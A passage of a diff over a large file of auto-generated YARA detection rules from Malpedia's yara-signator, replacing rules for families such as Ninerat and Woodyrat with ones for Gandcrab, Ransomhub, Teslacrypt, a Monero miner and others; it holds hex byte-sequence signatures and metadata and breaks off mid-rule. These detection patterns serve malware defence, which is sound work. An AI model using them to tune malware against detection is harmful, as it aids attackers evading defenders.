+		$sequence_2 = { 68???????? c685fcfeffff00 e8???????? 8d85fcfeffff 50 8d45fc 50 }
+		$sequence_3 = { 7c77 3c39 7f73 33c9 3c39 7f16 }
+		$sequence_4 = { 6a03 57 8b7d08 6880000000 56 8d45e8 }
+		$sequence_5 = { c645af54 c645b068 c645b172 c645b265 c645b361 }
+		$sequence_6 = { 7596 eb07 c7450c010000c0 8b4508 ff7008 ff15???????? }
+		$sequence_7 = { ff15???????? 8d45f8 50 8d45e8 50 56 53 }
+		$sequence_8 = { 83e103 f3a4 8b4218 83f8ff 7428 }
+		$sequence_9 = { ff34bd68830100 e8???????? a1???????? 47 83c504 3bf8 72bb }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Ninerat_Auto : FILE
+rule MALPEDIA_Win_Gandcrab_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "56fcbf79-427d-50d3-bca3-31de15eac399"
+		id = "b13655d9-7544-5839-87c5-fd4e5e753f37"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ninerat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ninerat_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gandcrab_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "7c80943a7e234598d055453bf04aeb26119fa41707d1bc3f20d9f334282eb72d"
+		logic_hash = "cdc40f7d17830a090b941b5f5b366bcc6036a417302630b2621031aa8f4178c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105213,38 +105405,32 @@ rule MALPEDIA_Win_Ninerat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8b45e0 4c3b45f0 734d 483b3e }
-		$sequence_1 = { 4c8b45e0 4c8945f0 4c8b4de8 4c894df8 4c8d45f0 }
-		$sequence_2 = { 4c89b570ffffff 4c89bd78ffffff 48894d10 4889d3 4d89c4 4d89cd 4883ec08 }
-		$sequence_3 = { 4c8b45e8 4889d9 e8???????? 488b5dd8 488b75e0 488be5 }
-		$sequence_4 = { 4c898dd0feffff 4c8bce 4c8b8500ffffff bac9090000 }
-		$sequence_5 = { 4c8b45e0 49c1e004 4c0345e8 4c39c6 72a8 31c0 488b5dc0 }
-		$sequence_6 = { 4c8b45e0 488b55f0 488b4de8 e8???????? }
-		$sequence_7 = { 4c8b45e8 488b4df8 e8???????? 4889c1 e8???????? }
-		$sequence_8 = { 0f84ac000000 e9???????? 4d8bb4f670300100 33d2 498bce 41b800080000 ff15???????? }
-		$sequence_9 = { 660fef8c24d0000000 66480f7ec8 69c895e9d15b 8bc1 c1e818 }
-		$sequence_10 = { 4d8be1 498be8 4c8bea 498b84ff70c20100 4983ceff 493bc6 0f84f9000000 }
-		$sequence_11 = { 488d0d85e80000 e8???????? 85c0 740a }
-		$sequence_12 = { 81fae9fd0000 0f8582010000 4c8d3d0c21ffff 418bd2 4d8b8cc7f0c60100 498bfa 4b8d04f1 }
-		$sequence_13 = { 660fef842420030000 660f7f842480000000 488d8c2480000000 ffd2 4c896c2450 }
-		$sequence_14 = { 3de4000000 7311 4898 488d0d025b0000 4803c0 8b04c1 eb02 }
-		$sequence_15 = { e8???????? 4c896c2450 488b442450 4889842430010000 }
+		$sequence_0 = { 837f4800 741b ff7750 ff15???????? ff774c }
+		$sequence_1 = { ff15???????? ff7728 8bf0 ff15???????? 03c3 8d5e04 }
+		$sequence_2 = { 03c3 8d5e04 03d8 837f3c00 741b ff7744 ff15???????? }
+		$sequence_3 = { 837f3c00 741b ff7744 ff15???????? }
+		$sequence_4 = { 03d8 837f5400 741b ff775c ff15???????? ff7758 8bf0 }
+		$sequence_5 = { 03c3 8d5e04 03d8 83bf8000000000 }
+		$sequence_6 = { 741b ff772c ff15???????? ff7728 8bf0 ff15???????? 03c3 }
+		$sequence_7 = { ff774c 8bf0 ff15???????? 03c3 8d5e04 }
+		$sequence_8 = { 741b ff7738 ff15???????? ff7734 }
+		$sequence_9 = { 837f3c00 741b ff7744 ff15???????? ff7740 8bf0 ff15???????? }
 
 	condition:
-		7 of them and filesize < 7709696
+		7 of them and filesize < 1024000
 }
-rule MALPEDIA_Win_Session_Manager_Auto : FILE
+rule MALPEDIA_Win_Httpdropper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7a55698-35d0-50fe-9be2-ce1d92ad4335"
+		id = "fe74c397-b0b6-56ba-ab68-0472f7992b43"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.session_manager_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.httpdropper_auto.yar#L1-L157"
 		license_url = "N/A"
-		logic_hash = "d5175a76f3322d7804a37437b75d91825889aed645aa1d99d4aedae744a409da"
+		logic_hash = "1f304e411e6e19a3397e572e7a13609bae133af12f0a3672cddde2eef3a5cdf3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105258,32 +105444,38 @@ rule MALPEDIA_Win_Session_Manager_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c89b888080000 4c89b890080000 4c89b898080000 4c89b8a0080000 4c89b8a8080000 4c89b8b0080000 }
-		$sequence_1 = { 4c89b8001a0000 4c89b8081a0000 4c89b8101a0000 4c89b8181a0000 4c89b8201a0000 4c89b8281a0000 4c89b8301a0000 }
-		$sequence_2 = { 418be8 4c8d0d66a80000 8bda 4c8d0555a80000 488bf9 }
-		$sequence_3 = { 488d5308 33c9 48890a 48894a08 488d4c2420 e8???????? 488d0542450100 }
-		$sequence_4 = { 7473 4c8d15c2f6feff 4b8b84fa80850200 f644383848 7421 8a8c2488000000 }
-		$sequence_5 = { 498b06 498bce ff5018 4c8b08 4533c0 488d15f71a0200 488bc8 }
-		$sequence_6 = { 488bd1 488bc1 48c1f806 4c8d05f4970100 83e23f 48c1e206 498b04c0 }
-		$sequence_7 = { 4c89b8481b0000 4c89b8501b0000 4c89b8581b0000 4c89b8601b0000 }
-		$sequence_8 = { 4c89b820220000 4c89b828220000 4c89b830220000 4c89b838220000 4c89b840220000 4c89b848220000 4c89b850220000 }
-		$sequence_9 = { 4c89b8781d0000 4c89b8801d0000 4c89b8881d0000 4c89b8901d0000 4c89b8981d0000 }
+		$sequence_0 = { 51 ff15???????? 85c0 0f85b9000000 68ff030000 }
+		$sequence_1 = { b803010000 899580f0ffff 8b95c0f0ffff 898568f0ffff 898584f0ffff }
+		$sequence_2 = { 7435 b9???????? e8???????? 8bd0 90 }
+		$sequence_3 = { 746f 803d????????00 b9???????? 7419 }
+		$sequence_4 = { 83ffff 7516 5f 5b }
+		$sequence_5 = { e8???????? 8be5 5d c3 8d85ecfdffff 8d5001 }
+		$sequence_6 = { c60000 40 2bd0 8d7432fb }
+		$sequence_7 = { 8bce c1f905 8b0c8d60aa0310 83e61f }
+		$sequence_8 = { 4883ec38 48c7442420feffffff 4c8d05740e0200 488d15350c0200 488d0dca9a0200 }
+		$sequence_9 = { 33c0 488bda 41b900100000 f2ae 33d2 }
+		$sequence_10 = { 33c0 488bd9 c644242800 8d7010 }
+		$sequence_11 = { 41c1e208 0fb6c1 4403d0 418bd0 c1ea18 }
+		$sequence_12 = { e8???????? 488b8b58400000 4885c9 7405 }
+		$sequence_13 = { 85c0 74a3 488bcf e8???????? 448b45e0 }
+		$sequence_14 = { e8???????? 448be8 8bf0 6666660f1f840000000000 }
+		$sequence_15 = { 448b442440 41ffc0 33d2 488bc8 e8???????? 41b801000000 }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Woodyrat_Auto : FILE
+rule MALPEDIA_Win_Ransomhub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55420983-c976-5f63-817e-19c52006bc78"
+		id = "16824eb2-4ba0-577a-a551-4908aad55778"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woodyrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.woodyrat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomhub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransomhub_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6c11e1a243653fb86d63eb1e0cef34e9f23e5fe6ae8acbf4e40cedaa8f4a73ea"
+		logic_hash = "f4a09a2e3b131a855ce4ab14c5a239317d5e0fe3c9ee416c213d5fc3f65e7c00"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105297,32 +105489,32 @@ rule MALPEDIA_Win_Woodyrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 884604 8bc6 890e 8b4df4 64890d00000000 59 5f }
-		$sequence_1 = { c645fc06 8bc4 8d4dc8 51 50 8d4dd4 }
-		$sequence_2 = { 0f8726020000 52 51 e8???????? 83c408 83c654 }
-		$sequence_3 = { 83ec08 8b4590 0f57c0 0f1107 8bf4 8945d4 0f114710 }
-		$sequence_4 = { 83ec18 c645fc03 8bf4 83ec18 8bcc 57 e8???????? }
-		$sequence_5 = { 894598 89459c 894d94 894da0 8945a4 660fd645a8 894db0 }
-		$sequence_6 = { 3d00100000 7227 8d4823 3bc8 0f868d070000 51 e8???????? }
-		$sequence_7 = { ffb5bcebffff e8???????? 8b45d4 8bf4 894604 8b45d8 894608 }
-		$sequence_8 = { 3bca 72b0 7704 3bc3 72aa 8b742410 }
-		$sequence_9 = { 8d047d02000000 50 ffb5acfeffff 51 e8???????? 8b8db0feffff 83c40c }
+		$sequence_0 = { 833d????????00 7509 48898780010000 eb15 488db780010000 4889f9 4889f7 }
+		$sequence_1 = { bf01000000 488d353b5f1c00 e8???????? 488b7c2458 48894f10 833d????????00 7506 }
+		$sequence_2 = { 4939da 740d 4c89d0 b930000000 e8???????? 31c0 31db }
+		$sequence_3 = { 88543c1d 418d50ad 8854341d 4883c002 4883f81e 7d27 0fb6540432 }
+		$sequence_4 = { eb8d 0f1f00 e8???????? 488d0514b23900 bb10000000 e8???????? 488d05a2de3900 }
+		$sequence_5 = { c3 e8???????? 0f1f440000 e8???????? 4889c3 488d0531862000 e8???????? }
+		$sequence_6 = { 752e 4c8b8424380b0000 4c8944d0d8 488d14d0 488d52e0 0f108424400b0000 0f1102 }
+		$sequence_7 = { bf01000000 488d35142c2800 e8???????? 4c8b442450 4c8b4c2440 4889da 4889c7 }
+		$sequence_8 = { e8???????? 450f57ff 4c8b35???????? 654d8b36 4d8b36 488d0538d53800 bb33000000 }
+		$sequence_9 = { 4c0f4ce7 4d39e3 7dc4 4c8b7828 4d29fa 4c8b7818 4d0fafd7 }
 
 	condition:
-		7 of them and filesize < 785408
+		7 of them and filesize < 12821504
 }
-rule MALPEDIA_Win_Ratankbapos_Auto : FILE
+rule MALPEDIA_Win_Makop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1e7d1d4-363b-5b45-848f-d4cc89843f97"
+		id = "55bb2009-0773-50d3-bf67-d639c1dcecf4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ratankbapos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makop_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "17591f183be92d031983360942e373f37d5a48aae82c019ca5afd1168616aff1"
+		logic_hash = "15bd73a7e0423413ca2025ecc2d41d366425fcba5c6c678e6bdd7d61fffbeff6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105336,32 +105528,32 @@ rule MALPEDIA_Win_Ratankbapos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d0cfd484a0110 8b11 3b55e0 7408 48 83e908 }
-		$sequence_1 = { 83c40c 6800100000 53 56 }
-		$sequence_2 = { 8b0c8de04d0110 c1e006 0fbe440104 83e040 5d c3 a1???????? }
-		$sequence_3 = { 83e01f c1f905 8b0c8de04d0110 c1e006 8d440104 800820 8b4df4 }
-		$sequence_4 = { c6040800 8b55a0 52 8945c4 e8???????? 8b4da4 8945c8 }
-		$sequence_5 = { ff15???????? 8b55c4 52 894314 }
-		$sequence_6 = { 4f 8a4f01 47 84c9 75f8 8b95f4dfffff 8bc8 }
-		$sequence_7 = { e8???????? 59 59 8b7508 8d34f5303c0110 391e }
-		$sequence_8 = { 56 e8???????? 8d0445c4420110 8bc8 }
-		$sequence_9 = { 8bc1 8da42400000000 8a10 3a11 751a 84d2 7412 }
+		$sequence_0 = { e8???????? 8d4c2414 51 a3???????? }
+		$sequence_1 = { ff15???????? 32c0 83c40c c3 837c240400 741f 8b0424 }
+		$sequence_2 = { 8d442414 50 51 6a00 6a00 57 }
+		$sequence_3 = { 7f06 0f84e6000000 f644241010 7432 }
+		$sequence_4 = { 85c0 5d 0f8596030000 8b0d???????? 50 68ef030000 51 }
+		$sequence_5 = { 897d00 7e54 8bc6 8a08 }
+		$sequence_6 = { 6a00 89542430 8b964c080000 55 89442430 }
+		$sequence_7 = { 8bcb 51 8b8c244c010000 52 50 51 e8???????? }
+		$sequence_8 = { 0f8462010000 8b4d0c 8b7d08 8d442414 50 51 6a00 }
+		$sequence_9 = { bf0d000000 be0a000000 668944241e 6689442430 6689442438 6689442446 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Dnespy_Auto : FILE
+rule MALPEDIA_Win_Teslacrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd2f9ed7-2d6f-5933-9493-a41c942bf03f"
+		id = "b4c671eb-91dc-5665-a0e1-4c4ec53aea8a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dnespy_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.teslacrypt_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "eee42a6a521e66ad81f34fb24c5fab011a7b4af2844dffcdf7998746a9a87ff5"
+		logic_hash = "028a2cbfed6bdff0ce2536414ae610c52e3d43ebb868ac2645461114e681877e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105375,32 +105567,38 @@ rule MALPEDIA_Win_Dnespy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c410 3bc1 7412 8bc3 83ceff 2bc1 03f8 }
-		$sequence_1 = { 8d4d88 e8???????? 83e7fd 83cf01 c745fc06000000 8b45b0 }
-		$sequence_2 = { 83c408 8b951cfeffff c78584feffff00000000 c78588feffff0f000000 c68574feffff00 83fa10 }
-		$sequence_3 = { 51 e8???????? 83c408 83c8ff 5f 5e 5b }
-		$sequence_4 = { 040d 3474 888575ffffff 8b8564ffffff 040e 3420 }
-		$sequence_5 = { 83eb01 75eb 836c241401 0f85b0feffff 8bf7 8d5a04 8bce }
-		$sequence_6 = { c68521f7ffff7e c68522f7ffff6f c68523f7ffff78 c68524f7ffff7e c68525f7ffff37 c68526f7ffff5e c68527f7ffff83 }
-		$sequence_7 = { 346c 8885e2f7ffff 8b8578f7ffff 0467 3461 8885e3f7ffff 8b8578f7ffff }
-		$sequence_8 = { ff15???????? 83c408 85c0 7553 8b451c 8b5e0c 894640 }
-		$sequence_9 = { e8???????? c645fc01 8b55b4 8bc2 8b4db0 2bc1 83f801 }
+		$sequence_0 = { 334500 335d04 334d08 33550c 81ffa0000000 0f8452030000 }
+		$sequence_1 = { 33457c 89859c000000 51 52 89f2 c1c808 0fb6c8 }
+		$sequence_2 = { 33550c 81ffa0000000 0f8456030000 81ffc0000000 0f84ae010000 }
+		$sequence_3 = { 0f84ac010000 81ffe0000000 740a b8ffffffff e9???????? }
+		$sequence_4 = { 3345f8 894518 3345fc 89451c }
+		$sequence_5 = { 3345f4 894514 3345f8 894518 }
+		$sequence_6 = { 3345fc 89451c 51 52 }
+		$sequence_7 = { 334500 335d04 83c510 8b7508 }
+		$sequence_8 = { 894c2434 89442430 8954242c 89742428 753a }
+		$sequence_9 = { 8b4c2418 83f900 894c2428 89442424 0f8540ffffff }
+		$sequence_10 = { 8954244c 894c2448 e8???????? 89442460 }
+		$sequence_11 = { 8b742410 39f1 8944240c 894c2408 88542407 }
+		$sequence_12 = { e8???????? 8d0dee304b00 8b542410 8902 890c24 e8???????? }
+		$sequence_13 = { 894a04 8b4c2468 890a e8???????? 83ec0c 31c9 8b54247c }
+		$sequence_14 = { 83f800 89442434 894c2458 0f842d010000 }
+		$sequence_15 = { 895c246c 89542468 89742464 897c2460 ffd6 83ec10 31c9 }
 
 	condition:
-		7 of them and filesize < 794624
+		7 of them and filesize < 1187840
 }
-rule MALPEDIA_Win_Goggles_Auto : FILE
+rule MALPEDIA_Win_Darkmegi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a06c6e9-c0df-5eb2-9be8-0912ecacc960"
+		id = "a0e854e1-d6b5-5413-b2d6-b8294aeb1c03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.goggles_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkmegi_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "6adf86a94e27e4da9bbef6eb899bde95be7c68b8b1a213561e769f61dd93d169"
+		logic_hash = "cbefd542cb2be5b91d54762f56be197fb7c2a5e2f979e1fe8e05b6ab3d5c06b3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105414,32 +105612,32 @@ rule MALPEDIA_Win_Goggles_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1fa02 83e23f 8a8a10400010 880c33 }
-		$sequence_1 = { 51 e8???????? 8b1d???????? b941000000 33c0 }
-		$sequence_2 = { 8d54247c 51 52 8d842488010000 68???????? 50 }
-		$sequence_3 = { 6a01 51 ff15???????? 8b742430 8b542431 }
-		$sequence_4 = { 53 ff15???????? 83c414 33c0 85ed }
-		$sequence_5 = { 51 ff15???????? 83c9ff bf???????? 33c0 83c414 }
-		$sequence_6 = { c744241002000000 8d8c2480020000 51 ff15???????? 8b442410 5f 5e }
-		$sequence_7 = { ffd5 8bf0 8bc7 99 f77c242c 81ee???????? 0fbe8288410010 }
-		$sequence_8 = { 2bd6 56 57 03ea ffd3 57 }
-		$sequence_9 = { a0???????? 55 57 88442410 }
+		$sequence_0 = { bf???????? 83c9ff 33c0 33d2 f2ae 8b6c2418 f7d1 }
+		$sequence_1 = { 50 687e660480 57 c744241c00000000 }
+		$sequence_2 = { 8bc1 8bf7 8bbc24ac020000 c1e902 f3a5 }
+		$sequence_3 = { 49 3bd9 7cd2 8806 5f 5e }
+		$sequence_4 = { 83d8ff 85c0 0f8420010000 8d842468010000 }
+		$sequence_5 = { 53 ffd5 56 ffd5 57 ff15???????? 5f }
+		$sequence_6 = { 8b8c8424010000 668b5108 52 ffd5 }
+		$sequence_7 = { 83c408 85ff 0f84a8000000 47 68???????? }
+		$sequence_8 = { 8b2d???????? f2ae 8b84249e030000 33db f7d1 }
+		$sequence_9 = { c3 e8???????? 8b0cf59c8cb402 5e }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 90304
 }
-rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE
+rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02559762-15b6-5207-804c-a16ddeee8406"
+		id = "ff8da921-664f-5df1-a82d-04fd7f26f2bd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.outlook_backdoor_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pittytiger_rat_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "3a281d78de1c71eb339e38944e06a51b382bc71a750ef84181f02e7a83ac1311"
+		logic_hash = "8acc632550999ec997897892dc652dc9572154a1b019a4992ae2e09d0384f83b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105453,32 +105651,32 @@ rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b450c 83650c00 53 56 0fb730 57 6685f6 }
-		$sequence_1 = { 8bf9 33f6 8bda 3bfe 740c 57 e8???????? }
-		$sequence_2 = { e8???????? 8b450c 8945f0 3bc3 7473 eb03 }
-		$sequence_3 = { 51 ff7608 8945f0 8d8528ffffff 50 e8???????? 59 }
-		$sequence_4 = { e8???????? 51 56 8b7508 8365fc00 e8???????? }
-		$sequence_5 = { 59 8b450c 8b5508 57 ff75f0 8bcb e8???????? }
-		$sequence_6 = { eb02 33c0 8bf0 ff75f0 ff15???????? 5f 8bc6 }
-		$sequence_7 = { 81c338070000 e8???????? 33ff 57 6a01 8d7500 }
-		$sequence_8 = { 03ce 034d08 2bc6 2b4514 }
-		$sequence_9 = { 57 8b7d10 8945e8 8b4518 895de0 897de4 8945ec }
+		$sequence_0 = { 7503 56 ffd3 6a50 68???????? 68???????? }
+		$sequence_1 = { 85c0 0f843d010000 8d8520fcffff 56 50 8d852cffffff 50 }
+		$sequence_2 = { 83c40c 8d45f4 50 6819010200 53 68???????? }
+		$sequence_3 = { ff7508 e8???????? 8d8600020000 50 8d85f8fbffff 68???????? 50 }
+		$sequence_4 = { 750a 68???????? e9???????? 8d85f8fdffff 56 }
+		$sequence_5 = { 3bc3 a3???????? 74d1 8d459c }
+		$sequence_6 = { 58 8903 eb2d 8d85fcfeffff 50 e8???????? }
+		$sequence_7 = { 0f85e8000000 8d45f4 897df4 50 8d85e0feffff 50 }
+		$sequence_8 = { be00010000 aa 56 8d85d0fdffff }
+		$sequence_9 = { 8945f0 33ff 397df0 743c 397df8 }
 
 	condition:
-		7 of them and filesize < 2912256
+		7 of them and filesize < 2162688
 }
-rule MALPEDIA_Win_Warezov_Auto : FILE
+rule MALPEDIA_Win_Monero_Miner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "daf7c87f-56d6-5ca2-a05f-f2106f7af4ec"
+		id = "9a367978-bd77-51cd-8e56-86e861b9daa1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warezov"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.warezov_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.monero_miner_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "76ba225e2c2800078c3a09fe679ba4718fd1f03fa3d573bef216fead7a711c12"
+		logic_hash = "4ac9d0cde3be6117a7ffb436bafb97493b6772afb7402a8076aa8c3226e1ef83"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105492,34 +105690,34 @@ rule MALPEDIA_Win_Warezov_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f805 7cf2 c684244002000064 c6842441020000b0 c68424420200005d c68424430200006c c684244402000063 }
-		$sequence_1 = { c64424156d c644241610 885c2417 c64424183c c6442419f9 c644241ae3 c644241b02 }
-		$sequence_2 = { 89456c 57 c64520ec c64521c7 c6452254 c645237d c64524dc }
-		$sequence_3 = { 0f857afeffff 393cb5c0214300 742e a1???????? 8d70ff 85f6 7c10 }
-		$sequence_4 = { 51 55 6aff 52 50 ff15???????? 85c0 }
-		$sequence_5 = { 83f813 7cec 56 6804010000 }
-		$sequence_6 = { 8a4b2c 8d530c 51 8b4d0c 52 50 51 }
-		$sequence_7 = { c6442459bd c644245a2a c644245b20 c644245c3b 33c0 8a5c0410 8a4c044c }
-		$sequence_8 = { 897c2474 c644246400 c7842484000000ffffffff 720d 8b442428 50 e8???????? }
-		$sequence_9 = { 898c2404010000 89942408010000 8b54246c 8d8c2498010000 898c240c010000 8b4c247c 89942410010000 }
+		$sequence_0 = { 8b542408 8b442404 85d2 7416 85c0 7412 8b08 }
+		$sequence_1 = { e8???????? 837b0c10 0f840a090000 8b4308 c7430c10000000 b9ffffffff 85c0 }
+		$sequence_2 = { 8b5e54 8b4e50 89442438 89df 21cf 83ffff 0f849efeffff }
+		$sequence_3 = { 8d442440 31c9 e8???????? 8d942480000000 8d842400010000 b901000000 e8???????? }
+		$sequence_4 = { c683f846000000 8983d8460000 8b8340010000 8983e8460000 8b83ec470000 890424 ff15???????? }
+		$sequence_5 = { c644242900 c644242a01 e9???????? 8b842468010000 8b00 890424 ff15???????? }
+		$sequence_6 = { 8b5c2420 8b742424 85db 7442 8b5348 85d2 7418 }
+		$sequence_7 = { 8b4c2440 31fd 31d3 034c2418 89ac2440040000 8b7c2444 137c241c }
+		$sequence_8 = { 0f29bc2400010000 85d2 0f851e080000 8b7d08 8b5930 8b4f34 89de }
+		$sequence_9 = { c1eb18 09d9 8b74240c 31ca 8b4c2414 c1e510 c1e618 }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 1425408
 }
-rule MALPEDIA_Win_Silence_Auto : FILE
+rule MALPEDIA_Win_Crylocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d33ad52-7f8b-5849-8776-4b47a03b0b3b"
+		id = "2b5ef66c-1ec0-5c10-8396-507384c0e395"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.silence_auto.yar#L1-L413"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crylocker_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "20bb026c801a434e63744ede6d8b88ca9db1780c69681a4497ad49040c78c67b"
+		logic_hash = "d90969734d25e11d990569603034674764175d320f05923dcd1a4fc7e127f4a1"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -105531,69 +105729,32 @@ rule MALPEDIA_Win_Silence_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740a 8a4801 40 84c9 75f4 eb05 803800 }
-		$sequence_1 = { e8???????? cc 8325????????00 c3 6a08 }
-		$sequence_2 = { 6a00 8d45fc 50 6a00 6a00 68???????? c745fc00000000 }
-		$sequence_3 = { 683f020f00 6a00 68???????? 6801000080 ff15???????? 68???????? }
-		$sequence_4 = { ff15???????? 6a00 6800000004 6a00 }
-		$sequence_5 = { 46 56 8d85f8feffff 50 }
